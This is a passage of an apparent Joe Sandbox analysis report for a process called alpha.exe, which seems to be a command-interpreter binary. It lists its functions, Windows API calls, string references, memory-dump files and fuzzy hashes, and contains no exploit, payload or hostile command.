Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
Instruction ID: 7b61cd67e8ddcab2408ed8c424b529c9d82f845491704bd68626486734819176
Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
Instruction Fuzzy Hash: 4C61E361B0924282FA14AB21D4681B9E6A1FF44796FF44978D91D07EE1EEBCF844C330

Function 00007FF7824010D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823DCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
Part of subcall function 00007FF7823DCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD

wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7823F827A), ref: 00007FF7824011DC
memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7823F827A), ref: 00007FF782401277

Strings

&()[]{}^=;!%'+,`~, xrefs: 00007FF7824011D5

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$AllocProcessmemmovewcschr
String ID: &()[]{}^=;!%'+,`~
API String ID: 1135967885-381716982
Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
Instruction ID: 8825ff5bb31d589bfe74f9af828ef124a8d3331e13034289abf16925f158b273
Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
Instruction Fuzzy Hash: 4C71BC71A08242C5EBA0EF15A440679F6E4FB98795FB04235D94E87B94DFBCAC85CB30

Function 00007FF7824008EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00007FF7824009BC
wcsncmp.MSVCRT ref: 00007FF7824009F5

Strings

0123456789, xrefs: 00007FF7824008FE

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memmovewcsncmp
String ID: 0123456789
API String ID: 3879766669-2793719750
Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
Instruction ID: 22f317efe0e545df01e79c0e05f7de7acf880b2b291cb12a8018a9b3e9e5e0cd
Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
Instruction Fuzzy Hash: DE411922F1878681EAA5AF26D4006BAB394FB54BD1FA46131CE4E43785DFBCD885C760

Function 00007FF7823F9784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823F97D0

Part of subcall function 00007FF7823DD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
Part of subcall function 00007FF7823DD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD4EE
Part of subcall function 00007FF7823DD3F0: iswspace.MSVCRT ref: 00007FF7823DD54D
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD569
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD58C

RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823F98D7

Strings

Software\Classes, xrefs: 00007FF7823F97C2

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
String ID: Software\Classes
API String ID: 2714550308-1656466771
Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
Instruction ID: 9cbb85585f40519163b0444a0941b5d3509c249f7fa24e79b5e04da4bbecdc79
Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
Instruction Fuzzy Hash: 7241D722B0975281EE40FB16E46403DA3A4FB84BD1FA08179DE5E47BE1DFB9D896C350

Function 00007FF7823FA0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823FA0FC

Part of subcall function 00007FF7823DD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
Part of subcall function 00007FF7823DD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD4EE
Part of subcall function 00007FF7823DD3F0: iswspace.MSVCRT ref: 00007FF7823DD54D
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD569
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD58C

RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823FA1FB

Strings

Software\Classes, xrefs: 00007FF7823FA0EE

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
String ID: Software\Classes
API String ID: 2714550308-1656466771
Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
Instruction ID: 07df0fb4a4c1b72678c0b32f2e7acf55192c8969ba05d5623c2085676dcf12bc
Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
Instruction Fuzzy Hash: 3241D422B1975281EE00FB15E464439A3A4FB447D1FA18179DE5E47BE0DEBDE882C310

Function 00007FF7823DCAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7823EC736
SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7823EC7E0

Strings

- , xrefs: 00007FF7823EC7A6

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ConsoleTitle
String ID: -
API String ID: 3358957663-3695764949
Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
Instruction ID: 420f593cf19e6fe494df6a59856c979bef7a47befc2c40c276a195e453b000f4
Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
Instruction Fuzzy Hash: E431AF25A0874295EA04BB11A824078EAA4BB49BD2FB44579CD0E07FD5DFBCE844C324

Function 00007FF7823E7280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 00007FF7823E72D2
swscanf.MSVCRT ref: 00007FF7823E731F

Strings

:EOF, xrefs: 00007FF7823E72E8

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsnicmpswscanf
String ID: :EOF
API String ID: 1534968528-551370653
Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
Instruction ID: 8e22c11f340b87cb175122f52780b5b29f77eac68412420ae4410a4150b0b4c8
Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
Instruction Fuzzy Hash: 72318335E18642A6FB54BB15E4602B8F2A0FF44742FE44075DA4D07E95DFACE845C770

Function 00007FF7823D3BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 00007FF7823D3C85

Strings

/-Y, xrefs: 00007FF7823F184D

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsnicmp
String ID: /-Y
API String ID: 1886669725-4274875248
Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
Instruction ID: 18477bbde160ddcd8c627ee1f678d1d662a39ffca535e3de15e589d01ce1668e
Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
Instruction Fuzzy Hash: 21219766E0875581FA10AB12A554278FAA0BB44FC2FA44475DE8D07B94DFBCECC2D720

Function 00007FF7823DB62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

3, xrefs: 00007FF7823DB64D
3, xrefs: 00007FF7823DB685

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID:
String ID: 3$3
API String ID: 0-2538865259
Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
Instruction ID: 769bb2de8fbe85faf4e4b78f04405431fb755920c3840a048c812323e4b0cfd7
Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
Instruction Fuzzy Hash: 91016DB5E1E1829AF3147B60D8982B4F661BF44353FF40179C40E069E1CFEC6888C671

Function 00007FF7823E06C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06D6
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06F0
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E074D
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E0762

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
Instruction ID: fe8f1ba7854b03f2b48be724ffc2b5b177d4b45605605a7c44b65eee9de31487
Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
Instruction Fuzzy Hash: 6B417C76A0974296EA14AF10E450179FBE0FF85B82FE48038CA5D07B54DFBCE849C760

Analysis Process: alpha.exePID: 6972, Parent PID: 6588COMMON

Execution Graph

Execution Coverage:	5.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	663
Total number of Limit Nodes:	27

Executed Functions

Function 00007FF7823E0A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E1EA0: wcschr.MSVCRT(?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF782400D54), ref: 00007FF7823E1EB3

_wcsnicmp.MSVCRT ref: 00007FF7823E0AFE
memset.MSVCRT ref: 00007FF7823E0B37
wcschr.MSVCRT ref: 00007FF7823E0B91
wcsrchr.MSVCRT ref: 00007FF7823E0C14
wcsrchr.MSVCRT ref: 00007FF7823E0D79
NeedCurrentDirectoryForExePathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-2-0 ref: 00007FF7823E0D9A
wcsrchr.MSVCRT ref: 00007FF7823E0FBB
wcschr.MSVCRT ref: 00007FF7823E0FD8
wcschr.MSVCRT ref: 00007FF7823E0FF3
_wcsicmp.MSVCRT ref: 00007FF7823E1091
_wcsicmp.MSVCRT ref: 00007FF7823E10B1
wcsrchr.MSVCRT ref: 00007FF7823E1102
_wcsicmp.MSVCRT ref: 00007FF7823E1124
_wcsicmp.MSVCRT ref: 00007FF7823E1142
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823E1169

Strings

PATHEXT, xrefs: 00007FF7823E0E6E
.CMD, xrefs: 00007FF7823E10A7, 00007FF7823E111A
cmd , xrefs: 00007FF7823E0AF4
PATH, xrefs: 00007FF7823E11D3
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC, xrefs: 00007FF7823EDA38
.BAT, xrefs: 00007FF7823E1087, 00007FF7823E1138
COMSPEC, xrefs: 00007FF7823ED927

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
API String ID: 3305344409-4288247545
Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
Instruction ID: f1fc7b43091ccaca5fd533c30268ff22d908fca2381e32a1fa5fffd121b7dbd5
Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
Instruction Fuzzy Hash: 55421A25A0868295EB50BB11D8202B9E7A0FF85B96FE44178DD5E57FD4DFBCE848C320

Function 00007FF7823DAA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7823DCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
Part of subcall function 00007FF7823DCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD

wcschr.MSVCRT ref: 00007FF7823DAAB6
towlower.MSVCRT ref: 00007FF7823DAAD5
memset.MSVCRT ref: 00007FF7823DAC27
wcschr.MSVCRT ref: 00007FF7823DAC3C
wcschr.MSVCRT ref: 00007FF7823DAC60
wcsrchr.MSVCRT ref: 00007FF7823DAC9B
wcschr.MSVCRT ref: 00007FF7823DAD82
wcschr.MSVCRT ref: 00007FF7823DAD9D
wcschr.MSVCRT ref: 00007FF7823DADB8
wcschr.MSVCRT ref: 00007FF7823DADD3
wcschr.MSVCRT ref: 00007FF7823DADEE
wcschr.MSVCRT ref: 00007FF7823DAE09
iswspace.MSVCRT ref: 00007FF7823DAE30

Strings

:, xrefs: 00007FF7823EBCFE
:, xrefs: 00007FF7823EBC26
OFF, xrefs: 00007FF7823EBC32, 00007FF7823EBC92, 00007FF7823EBD0A
:ON, xrefs: 00007FF7823EBD37
:, xrefs: 00007FF7823EBC86

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
String ID: :$:$:$:ON$OFF
API String ID: 972821348-467788257
Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
Instruction ID: 4a7e53762f0a869fec2d6f8f4a0b61da8195ee142f5ac8839a682d2addbe7c28
Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
Instruction Fuzzy Hash: DD22C565A0864395EB65BF21D524278EA91FF48B83FE88079C90E47F94DFBCA844C370

Function 00007FF7823E51EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7823E5508: GetUserDefaultLCID.KERNELBASE(?,?,?,?,00007FF7823D6F97), ref: 00007FF7823E550C

GetLocaleInfoW.KERNELBASE ref: 00007FF7823E5237
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E5260
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E52AB
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E52F7
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E5335
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E5360
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E5388
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E53B0
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E53D8
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E5400
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E5428
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E5450
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E5478
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E54A0
setlocale.MSVCRT ref: 00007FF7823E54BD

Strings

Tue, xrefs: 00007FF7823EF035
dd/MM/yy, xrefs: 00007FF7823EEFA3
Sun, xrefs: 00007FF7823EF184
yy/MM/dd, xrefs: 00007FF7823EEF8D
Thu, xrefs: 00007FF7823EF0BB
Mon, xrefs: 00007FF7823EEFF2
Fri, xrefs: 00007FF7823EF0FE
Sat, xrefs: 00007FF7823EF141
Wed, xrefs: 00007FF7823EF078
.OCP, xrefs: 00007FF7823E54B4
MM/dd/yy, xrefs: 00007FF7823E52D0

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: InfoLocale$DefaultUsersetlocale
String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
API String ID: 1351325837-2236139042
Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
Instruction ID: 1b4550147cb6ddf8cda9f0308d50090654fb4eeac9d8d6c3e1876942f8997a16
Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
Instruction Fuzzy Hash: 91F18069B0474295EF51AF11D5202B9B6A4FF08B82FE44179CA0D53B94EFBCE94AC330

Function 00007FF7823E4224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328
threadprocessstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E4297
UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E42D7
memset.MSVCRT ref: 00007FF7823E42FD
memset.MSVCRT ref: 00007FF7823E4368
GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E4380

Part of subcall function 00007FF7823E3A90: wcsrchr.MSVCRT ref: 00007FF7823E3ADF
Part of subcall function 00007FF7823E3A90: _wcsnicmp.MSVCRT ref: 00007FF7823E3B38

wcsrchr.MSVCRT ref: 00007FF7823E43E6
lstrcmpW.KERNELBASE ref: 00007FF7823E4401
CreateProcessW.KERNELBASE ref: 00007FF7823E447F
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823E44AA
